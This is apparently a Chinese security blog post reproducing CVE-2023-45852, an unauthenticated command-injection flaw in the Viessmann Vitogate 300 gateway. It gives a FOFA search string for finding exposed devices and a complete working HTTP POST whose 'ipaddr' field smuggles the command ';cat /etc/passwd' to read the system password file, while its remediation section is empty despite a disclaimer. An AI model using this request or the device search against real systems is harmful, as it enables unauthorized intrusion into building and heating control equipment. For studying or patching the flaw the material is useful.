【漏洞复现】Viessmann Vitogate远程代码执行(CVE-2023-45852)

漏洞描述

Vitogate 300 2.1.3.0版本的/cgi-bin/vitogate.cgi存在一个未经身份验证的攻击者可利用的漏洞,通过put方法中的ipaddr params JSON数据中的shell元字符实现绕过身份验证并执行任意命令。

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:"Vitogate 300"

漏洞复现

利用如下POC进行POST请求查看passwd文件

复制代码
POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: {{Hostname}}
Content-Length: 76
Content-Type: application/json


{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}

修复方案

相关推荐
go_to_hacker3 天前
AI进行全自动渗透
网络·web安全·网络安全·渗透测试·代码审计
vortex57 天前
如何为 Debian 和 Kali 系统更换软件源并更新系统
linux·运维·网络·网络安全·渗透测试·debian·kali
H轨迹H8 天前
Hack The Box-Chemistry靶机渗透
网络安全·渗透测试·kali·信息收集·web漏洞
H轨迹H10 天前
Hack The Box-Cap靶机
网络安全·渗透测试·kali·ftp·web漏洞·oscp
摸鱼也很难12 天前
JAVA组件的利用漏洞 && Shlr搜索引擎 && shiro身份 && Log4j日志
cve·漏洞复现·组件安全
摸鱼也很难13 天前
框架的CVE漏洞利用 && php类 && java类 && 手工操作和自动化操作&&蓝队分析漏洞利用的流量特征
cve·漏洞复现·蓝队流量分析
H轨迹H18 天前
Hack The Box-代理连接及靶机-Meow-喵呜
网络安全·渗透测试·hack the box·web漏洞
go_to_hacker18 天前
奇安信面试题
测试工具·安全·web安全·渗透测试
go_to_hacker19 天前
奇安信二面
网络·web安全·网络安全·渗透测试·代码审计·春招